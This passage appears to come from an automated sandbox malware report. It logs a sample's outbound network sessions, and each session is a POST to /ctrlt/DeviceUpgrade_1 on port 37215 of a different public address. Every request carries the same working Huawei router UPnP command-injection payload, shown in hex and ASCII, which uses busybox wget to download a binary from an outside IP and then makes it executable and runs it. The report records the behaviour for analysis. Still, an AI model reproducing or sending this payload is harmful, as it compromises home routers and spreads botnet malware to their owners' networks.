                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              555192.168.2.1539662197.178.105.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721357107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              556192.168.2.1553690157.224.229.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721393108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              557192.168.2.155394837.165.200.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721405983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              558192.168.2.1550254190.135.129.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721427917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              559192.168.2.1560044102.138.249.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721431971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              560192.168.2.1555628186.11.70.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721466064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              561192.168.2.1555944190.102.150.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721481085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              562192.168.2.1537504222.200.17.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721508980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              563192.168.2.1539372186.113.202.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721508980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              564192.168.2.155125078.241.184.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721508980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
